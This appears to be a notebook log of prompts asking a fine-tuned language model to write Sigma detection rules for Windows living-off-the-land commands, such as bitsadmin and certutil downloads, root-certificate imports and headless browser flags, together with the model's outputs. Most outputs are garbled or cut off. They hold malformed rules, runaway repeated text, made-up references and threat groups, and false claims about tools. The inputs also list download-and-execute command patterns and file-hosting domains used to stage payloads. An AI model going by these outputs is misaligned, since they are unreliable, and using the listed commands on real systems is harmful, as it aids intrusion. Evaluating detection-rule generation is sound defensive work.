### Recommended CLI Command

This rule is not recommended to be used by default since it can generate a lot of false positives.

```bash
syft --json -o json -f system -f pe --local-plugins --remote-plugins pE --remote-plugins dE anon_pe anon_dE pkgmgr anon-pe anon-dE group-policy registry windows -u -v -d -l info | jq -r '.PotentialExecutables |.[] | select(.type == "pe" or.type == "anon-pe" or

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bcp.exe BCP.exe out queryout

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bcp.exe BCP.exe out queryout

### Response:

An attacker might export data from a SQL database using a tool like bcp.

An attacker might export data from a MongoDB using mongodump.

An attacker might export data from a Redis using REDISDUMP.EXE.

An attacker might export data from an ElasticSearch using ElasticDump.

An attacker might export data from an etcd using etcdctl backup save.

An attacker might export data from a Consul using consul snapshot save.

An attacker might export data from a Kubernetes using kubectl exec -it etcd -- etcdctl snapshot save.

An attacker might export data from a minio using mc cp.

An attacker might export data from a webmin using wget.

An attacker might export data from a Owncloud using wget.

An attacker might export data from a phpmyadmin using wget.

An attacker might export data from a proftpd using wget.

An attacker might export data from a pureftpd using wget.

An attacker might

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\\"\\BitLockerToGo.exe\\\

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\"\BitLockerToGo.exe\
### Response:

query: bitlocker togo
id: 1b589eb9-4210-490f-ac17-d33a4978ee83
status: test
description: Detects BitLocker To Go executable being spawned
references:
    - https://twitter.com/mariuszbit/status/1478891889292028742
author: Florian Roth (Nextron Systems)
date: 2022-01-04
modified: 2023-03-04
tags:
    - attack.execution
    - attack.t1569
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\BitLockerToGo.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

```

### parsed.log

Filename: parsed.log

```
Time	Process	PID	Image	Description
08-16 10:56:38	svchost	2056	\SystemRoot\System32\svchost.exe	Service Host: Uso di ScServer COM
08-16 10:56:38	scserver	1408	\SystemRoot\System32\scserver.exe	COM+ Server Process: Avvio di ScServer
08-16 10:56:38	lsass	964	\SystemRoot\System32\lsass.exe	Avvio del servizio d

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bitsadmin.exe bitsadmin.exe /transfer /create /addfile http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

You seem to be using the pipelines sequentially on GPU. In order to maximize efficiency please use a dataset


### Instruction:
Write Sigma rule to detect payload:

### Input:
\bitsadmin.exe bitsadmin.exe /transfer /create /addfile http

### Response:
Download File Via Bitsadmin.exe


Author: X0x0X0X0X0X0X0X0
Description: Detects usage of bitsadmin.exe to download a file
References:
    - https://github.com/redcanaryco/atomic-red-team/blob/f399b902f55329f80ee7f75086daf7423f9e501/atomics/T1197/T1197.md
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bitsadmin/
    - https://eqllib.readthedocs.io/en/latest/analytics/f68d3b12-d389-4535-96e4-35908d361a65.html
    - https://eqllib.readthedocs.io/en/latest/analytics/34816551-2b6b-4253-82d3-e0275012673d.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f399b902f55329f80ee7f75086daf7423f9e501/atomics/T1197/T1197.md#atomic-test-21---bitsadmin-download-a-file
    - https://github.com/redcanaryco/atomic-red-team/blob/f399b902f55329f80ee7f75086daf7423f9e501/atomics/T1197/T1197.md#atomic-test-23---bitsadmin-download-a-file-with-cr

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bitsadmin.exe bitsadmin.exe /transfer /create /addfile ://1 ://2 ://3 ://4 ://5 ://6 ://7 ://8 ://9 ://7-

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bitsadmin.exe bitsadmin.exe /transfer /create /addfile ://1 ://2 ://3 ://4 ://5 ://6 ://7 ://8 ://9 ://7-

### Response:
Download File Via BITS With URL Colon Slash Slash
id: e7f1052e-5e9e-4e15-8d5c-d89457f19956
status: test
description: Detects usage of bitsadmin to download a file from a URL
references:
    - https://twitter.com/0gtweet/status/1234370938600706822
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-05-07
modified: 2023-02-14
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\bitsadmin.exe'
        OriginalFileName: 'bitsadmin.exe'
    selection_cli:
        CommandLine|contains:'/transfer /create /addfile '
        CommandLine|contains: '://1 '
    condition: selection_img and selection_cli
falsepositives:

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bitsadmin.exe bitsadmin.exe /transfer /create /addfile .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bitsadmin.exe bitsadmin.exe /transfer /create /addfile .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev

### Response:
Goto https://www.anongit.eu/unshortener/ for unshortener list



## Atomic Tests

- Atomic Test #1: Use BITS to Transfer File
    Download and execute a file with BITS
    The local command interperter (cmd.exe) will be used to start the download and the program specified in the ATT&CK
    Anonymous.EXE will be used to monitor the progress of the download
    The Anonymous.exe will be used to signal the end of the download and the execution of the prog

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bitsadmin.exe bitsadmin.exe /transfer /create /addfile .7z .asax .ashx .asmx .asp .aspx .bat .cfm .cgi .chm .cmd .dll .gif .jpeg .jpg .jsp .jspx .log .png .ps1 .psm1 .rar .scf .sct .txt .vbe .vbs .war .wsf .wsh .xll .zip

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bitsadmin.exe bitsadmin.exe /transfer /create /addfile .7z .asax .ashx .asmx .asp .aspx .bat .cfm .cgi .chm .cmd .dll .gif .jpeg .jpg .jsp .jspx .log .png .ps1 .psm1 .rar .scf .sct .txt .vbe .vbs .war .wsf .wsh .xll .zip

### Response:
Trusted: Remote File Transfer Via Bitsadmin.exe
id: e8c72d6d-1c57-4d5f-9b50-6edb6b6f1666
status: test
description: Detects usage of bitsadmin downloading or uploading files to a remote server
references:
    - https://blog.netspi.com/10-ways-to-download-files-and-execute-them-using-windows-defender/
author: Florian Roth (Nextron Systems)
date: 2017-03-09
modified: 2023-11-21
tags:
    - attack.command-and-control
    - attack.t1105
    - attack.t1102
    - attack.t1021.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'bitsadmin.exe'
            - 'http'
            - 'https'
    condition: selection

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bitsadmin.exe bitsadmin.exe /SetNotifyCmdLine %COMSPEC% cmd.exe regsvr32.exe /Addfile http: https: ftp: ftps:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bitsadmin.exe bitsadmin.exe /SetNotifyCmdLine %COMSPEC% cmd.exe regsvr32.exe /Addfile http: https: ftp: ftps:

### Response:
An attacker can use BITS to download and execute arbitrary files on the system.

### Additional Information:

- https://twitter.com/0gtweet/status/1633855414752788992?s=12
- https://www.fireeye.com/blog/threat-research/2022/10/apt21-apt-charm-cobra-crescent.html
- https://news.sophos.com/en-us/2022/08/19/bits-babysitter-apt21-apt-charm-cobra-crescent-leverage-abuse-transfer

### Unit Tests

#### Test Case 1:
Execute bitsadmin.exe with the following flags: SetNotifyCmdLine, COMSPEC, cmd.exe, regsvr32.exe, /Addfile, http:, https:, ftp:, ftps:
Input:
COMSPEC %COMSPEC%
cmd.exe %COMSPEC%
regsvr32.exe %COMSPEC% /Addfile http: https: ftp: ftps:
set COMSPEC %COMSPEC%
cmd.exe %COMSPEC% """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
--remote-debugging- --user-data-dir --headless

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
--remote-debugging- --user-data-dir --headless

### Response:
RemoteDebugging
infos : \User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/60.0 - - [HEAD] /http://127.0.0.1:


An adversary can use the browser feature of Remote Debugging to communicate with a remote web server.
Remote Debugging enables a browser to debug web applications in a web browser by attaching to a web server and receiving the debug information that the server sends back.

When this feature is used, the browser opens a WebSocket connection to the specified endpoint and sends the "WebSocket" handshake request to the server.

Adversaries can use this feature to communicate with a web server that hosts a browser-based proxy or other components of an adversary supply chain.

Input: \Chrome.exe "Chrome.exe" --remote-debugging- --user-data-dir --headless
title: Browser Remote Debugging Activity
id: 6015842f-6256-4303-92b8-8531a38657a0
status: test
description:

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\brave.exe \\chrome.exe \\msedge.exe \\opera.exe \\vivaldi.exe --headless

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\brave.exe \chrome.exe \msedge.exe \opera.exe \vivaldi.exe --headless

### Response:
For info on what is headless browsing see https://developers.google.com/web/tools/puppeteer/faq

An adversary can use headless browsers to launch multiple instances of browser windows without user interaction.

- **Type**: Obfuscated
- **Product**: S039
- **Data Source**: Command Line
- **Description**: Detects headless browser process creation (Chrome, Edge, Firefox)



### Rgineering/2021/10/19/headless-browser-attack-tool-used-by-chinese-espionage-ops-targeting-us-state-depts/

https://www.zdnet.com/article/chinese-hackers-accused-of-cyberespionage-attacks-in-u-s-national-security-agencies/

https://www.bleepingcomputer.com/news/security/chrome-extensions-used-by-nsa-espionage-team-can-steal-browser-cookies/

https://www.xda-developers.com/stealth-headless-browser-windows-on-android/

https://lone-wolf.cc/14501/hackers-launch-attack-ag

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\brave \\chrome \\msedge \\opera \\vivaldi --headless dump-dom http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\brave \chrome \msedge \opera \vivaldi --headless dump-dom http

### Response:
Any headless browser can be used to execute javascript code remotely.











    title: Javascript Execution Via Headless Browser
    id: 5d2e1789-29b2-4520-8a3d-96b882479112
    status: test
    description: |
        Detects the execution of Javascript code within a headless browser via a commandline flag.
        This might indicate a browser used for web enumeration, local privilege escalation or remote code execution.
        Note that this rule will not catch all cases where a browser is used for remote code execution.
    references:
        - https://twitter.com/gamelinuxsec/status/1438977862059668738
        - https://twitter.com/gamelinuxsec/status/1440620076417646598
        - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Opera/
    author: Florian Roth (Nextron Systems)
    date: 2021-07-22
    tags:
        - attack.d

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\brave.exe \\chrome.exe \\msedge.exe \\opera.exe \\vivaldi.exe --headless ://run.mocky ://mockbin

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\brave.exe \chrome.exe \msedge.exe \opera.exe \vivaldi.exe --headless ://run.mocky ://mockbin

### Response:
Noise Ratio: medium
Status: test
Description: Detects execution of Chromium-based browser process with headless command line arguments pointing to mockbin.org endpoints.
References:
    - https://twitter.com/bohops/status/1526591505954150664
    - https://mockbin.org/
    - https://github.com/bohops/ThreatHunting/blob/d94170329a8843f20d5600e39e5ef915b09b79a3/detections/headless-browser-executing-http-request.yarp
    - https://github.com/bohops/ThreatHunting/blob/d94170329a8843f20d5600e39e5ef915b09b79a3/detections/headless-browser-executing-http-request-2.yarp
    - https://yarp.axiomfail.com/
    - https://www.google.com/search?sxsrf=ALeKk03MhKgZ_oYXEzfTZQQq4qE35H3qQg%3A1617881055978&ei=eBh5YbT9OYXSjwOcmoXwAQ&q=%22headless%22+%22--headless%22+%22+http%3A%2F%2Fmockbin.org%2F%22+%22+--disable-gpu+%2B%22%3A3506+%22%3

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
--remote-debugging- \\firefox.exe -start-debugger-server

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
--remote-debugging- \firefox.exe -start-debugger-server

### Response:
So setup a SMB relay and use this to start a fireup in a suspicious process:
https://medium.com/redcanary-blog/new-notable-attacks-from-the-lone-fernflower-9384d9122305

Input: \firefox.exe -remote-debugging-server \http://127.0.0.1:8000
id: c67c7a8c-341c-4e91-a990-c0e31d28e3d8
status: test
description: |
    Attacker starts a web server that receives connections from Firefox.
    When Firefox connects to the server, the web server sends Firefox the value of the hidden field "url" that is used by firefox to load a page.
    An attacker can send the value of any URL they want and thus achieve redirection to an attacker controlled page.
    This can be chained with other attacks like Lolbin or other ABIK bypasses.
    More details about this technique can be found here: https://learn.microsoft.com/en-us/security/blog/new-notable-attacks-from-the-lone-fer

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cdb.exe CDB.Exe -c -cf

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cdb.exe CDB.Exe -c -cf

### Response:
@echo off
if exist "%1" cdb.exe -c -cf -v -e -d -f -c -cf -b -cf -v -e -d -f -c -cf -r -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -w -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -w -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -w -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -w -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -w -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf -v -e -d -f -c -cf -m -cf

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\CertMgr.exe CERTMGT.EXE /add root

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\CertMgr.exe CERTMGT.EXE /add root

### Response:
Ensure that certificate management tool is on the system and then execute the following command:

CertMgr.exe /add root
title: Suspicious Certificate Import Via CertMgr.EXE
id: 40265482-7284-476c-967b-4c2290772d0d
related:
    - id: 0372e7f6-40fb-4e04-a0ee-42232c6891b7
      type: similar
    - id: f46655b5-9a0c-4d92-8f3a-0955850689b2
      type: similar
status: test
description: Detects execution of certmgr.exe with the "add" flag to import new certificates. This can be abused by attackers to install malicious certificates.
references:
    - https://redcanary.com/blog/intelligence-insights/
    - https://github.com/redcanaryco/atomic-red-team/blob/0f2091720d3004e49b114 def5545f09a1346008d9f0963bd96d8786685e62/atomics/T1218/T1218.md#atomic-test-11---use-certmgr-utility-to-install-a-root-certificate
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-07
modified

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certoc.exe CertOC.exe -GetCACAPS http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certoc.exe CertOC.exe -GetCACAPS http

### Response:
[
    {
        "id": "66169153-681a-440f-9616-f9355828b8a8",
        "status": "test",
        "description": "Detects certutil.exe running with CertOC.exe which indicates a possible execution of a cer file as a binary via certutil.exe downloadcer.exe

Note: The certoc.exe is the certificate viewer tool that comes with the Windows SDK. This tool can be used to extract information from a certificate as well as view it.

Certutil.exe is included in the Windows SDK which contains various utilities. One of these utilities is downloadcer.exe which downloads files from a specified URL.

This module combines these utilities to download a file and then display the contents of that file.

This module is used in several different exploit chains. One of these is used in the HUAWEI RW16 Log4j exploit and the BlackMatter Pulse exploit

More information: https://blog.blueteam.one/h

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certoc.exe CertOC.exe -LoadDLL

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certoc.exe CertOC.exe -LoadDLL

### Response:
Severity: Low
Module: Processes
Process: False
Stage: Execution
CommandLine: 'certoc.exe' -LoadDLL
OriginalFileName: certoc.exe
FilterType: Image
FilterOperator: Include

ID: 34159b88-c862-4f3e-90c2-417983676f75
Status: test
Description: Detects the execution of the Certificates snap-in Certoc.exe
References:
    - https://thedfirreport.com/2022/07/13/stolen-images-on-a-swedish-island/
Author: '@t0XickE'
Date: 2022-07-14
Modified: 2023-01-13
Tags:
    - Attack.Execution
    - Attack.T1569.001
    - Attack.DefenseEvasion
    - S0149
LogSource:      Process_Executable
LogDescription: Image Loaded
Field: Image
Condition:  proces - Attack.Execution
    - Attack.DefenseEvasion
    - S0149
LogSource:      Process_Image
LogDescription: Image Loaded
Field: Image
Condition:  Image Like '%\%certoc.exe'
Description: Detects the execution of the Certificates snap-in Certoc.exe
References

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -addstore root

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -addstore root

### Response:
Install trusted root certificate
id: d70e9d79-626c-417a-b999-20186677a96a
status: test
description: Detects execution of certutil with the "addstore" flag to install a new root certificate.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://twitter.com/malcomba/status/992515387197316864
author: Florian Roth (Nextron Systems)
date: 2019-02-14
modified: 2023-02-23
tags:
    - attack.execution
    - attack.t1569
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|:
        - 'certutil.exe'
        - 'addstore'
    condition: selection
falsepositives:
    - Uncommon usage
level: medium




```



### Sigma rule:

Input: \Certutil.exe CertUtil.exe -addstore root
id: 0b5f8283-54c1-4c02-8e41-a3c5c93d6172
status: test
description: |
    De

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -decode -decodehex

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -decode -decodehex

### Response:
[CONTENT]


### References:

https://twitter.com/nas_bench/status/992170876980234240
https://www.trustwave.com/Resources/Spotlights/Spotlight-Utilities/


### Description:

    Detects usage of certutil.exe to decode binary files.
    Certutil.exe is a command line utility that is included in all versions of Windows.
    It includes many utility functions such as downloading files over http, decoding base64 encoded files, and more.

    Certutil.exe can be abused by attackers to decode and run arbitrary binaries.

    Certutil.exe is included by default in all versions of Windows and can be found located at the following locations:

    - C:\Windows\System32\certutil.exe
    - C:\Windows\SysWOW64\certutil.exe

    Certutil.exe is used in many legitimate utilities such as

    - Downloading files
    - Verifying the integrity of files
    - Decoding base64 encode

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe urlcache verifyctl http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe urlcache verifyctl http

### Response:
[
    {
        "id": "82f06964-82c1-4e3f-a8a5-48183f09f5a7",
        "status": "test",
        "description": "Detection of certutil.exe downloading or installing a file. Download is done via http or https.
        It is possible to bypass this using different protocols.
        This can also be used to download a file directly to a specified location.
        The file will be downloaded to %temp% in most cases.
        A good indicator of suspicious behaviour is if the file is downloaded to a location other than %temp%
        A low integrity level can bypass this protection.
        The file will be created with the low integrity level to avoid being removed by antivirus.
        A symbolic link can be used to hide the real location of the file
        In addition, the file will be given the low integrity level.
        This can be used to bypass any pro

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe urlcache verifyctl ://1 ://2 ://3 ://4 ://5 ://6 ://7 ://8 ://9 ://7-

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe urlcache verifyctl ://1 ://2 ://3 ://4 ://5 ://6 ://7 ://8 ://9 ://7-

### Response:
An attacker can use certutil to download malicious files from the internet.
These files will be saved in the user’s browser cache.
A command similar to the following shows the location of the user’s browser cache:

certutil -v -urlcache [list] ://1 ://2 ://3 ://4 ://5 ://6 ://7 ://8 ://9 ://7-

This is a type 1 exfiltration where the attacker leverages the browser cache.




### References:
https://www.huntress.com/blog/20/8/20/certutil-leveraging-the-browser-cache

https://www.cybereason.com/blog/certutil-leveraging-the-browser-cache-to-exfiltrate-files

https://twitter.com/Oddvarmoe/status/1649697124740271360

https://www.cybereason.com/blog/threat-hunting-certutil-a-leveraged-browser-cache



### CW_STANDARD_12.2.1: Certutil can be used to download arbitrary files from the Internet.

Category: Attack Pattern


In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe urlcache verifyctl .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe urlcache verifyctl .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev

### Response:
[
    {
        "category": "TTP",
        "description": "Potential file upload and remote code execution using certutil. Certutil can download files and execute ActiveX controls",
        "references": [
            "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
            "https://lolbas-project.github.io/lolbas/Binaries/Certutil/"
        ],
        "cvss_score": "6.8",
        "status": "test",
        "descrip

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -encode

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -encode

### Response:
[CONTENT]
title: Suspicious Certutil.exe Execution
id: d095060a-4e02-4755-a0f2-6320d207018c
status: test
description: Detects a certutil execution with the encode flag. This is usually done to encode a file from a binary to base64.
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/54f160b440753d537bcd26f934338790765b3261/yml/OSBinaries.yml#364
    - https://web.archive.org/web/20191013092435/https://twitter.com/tiktak_12/status/1180806644751728896
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-09-07
tags:
    - attack.defense-evasion
    - attack.t1027.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains: 'certutil.exe encode'
    condition: selection
falsepositives:
    - Unknown
level: medium

```

### Generic

Organization: Threat Hunt

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -encode .acl .bat .doc .gif .jpeg .jpg .mp3 .pdf .png .ppt .tmp .xls .xml

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -encode .acl .bat .doc .gif .jpeg .jpg .mp3 .pdf .png .ppt .tmp .xls .xml

### Response:
Either a file with the given extension is missing or the program is not installed on the system

### Detection:
Selection | Path | Description | Data/Info | nd(path,".doc")
                or utils.is_in_list(path,utils.get_trusted_img()[1])
            )
            utils.exec_process("certutil.exe -decode temp.cert.exe {0}".format(path))
            os.remove("temp.cert.exe")
        if file_name.lower() in [".png",".jpg",".jpeg",".gif",".bmp"]:
            if not utils.is_in_list(path,utils.get_trusted_img()[0]):
                return False
        if file_name.lower() in [".mp3",".avi",".mp4",".mov",".mkv",".wmv",".webm",".m4v",".vob",".wav"]:
            if not utils.is_in_list(path,utils.get_trusted_audio()[0]):
                return False
        if file_name.lower() in [".pdf",".exe",".mp4",".mkv",

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -exportPFX

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -exportPFX

### Response:
Export PFX certificate from certutil.exe



### id: f6e8ef4d-f49b-466a-b622-4f222819246d
status: test
description: |
    Detects the use of "certutil" to export a PFX certificate.
    Certutil is a tool included with Windows that can be used to export different types of certificates.
    This rule is based on a pattern seen being used by Threat Group Brainsplease in March 2022.
    Threat Group Brainsplease used certutil to export their PFX certificates, which were embedded in a DLL and loaded into a suspicious process.
references:
    - https://blog.talosintelligence.com/2022/03/behold-brainsplease.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-25
modified: 2023-12-02
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.t1524.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
      

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\certutil.exe CertUtil.exe -syncwithWU \\\\\\\\

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\certutil.exe CertUtil.exe -syncwithWU \\\\

### Response:
[
    {
        "id": "2178c7c3-958b-4d29-97f5-84f6ef8e6931",
        "status": "test",
        "description": "Detects a certutil.exe execution which downloads files from a shared folder. This can be abused by attackers to download files in a chain in order to avoid tracking.
